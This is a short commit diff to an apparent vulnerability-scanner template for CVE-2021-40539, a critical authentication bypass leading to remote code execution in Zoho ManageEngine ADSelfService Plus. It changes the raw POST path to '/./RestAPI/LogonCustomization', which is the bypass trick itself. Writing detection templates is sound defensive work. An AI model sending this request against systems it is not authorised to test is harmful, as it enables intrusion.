Update CVE-2021-40539.yaml

patch-1
Prince Chaddha 2021-09-16 18:18:51 +05:30 committed by GitHub
parent da9e132232
commit 55d676dc77
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 2 deletions

View File

@ -5,16 +5,16 @@ info:
author: daffainfo
severity: critical
description: Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.
tags: cve,cve2021,rce,zoho
reference:
- https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539
tags: cve,cve2021,rce,zoho
requests:
- raw:
- |
POST /RestAPI/LogonCustomization HTTP/1.1
POST /./RestAPI/LogonCustomization HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 27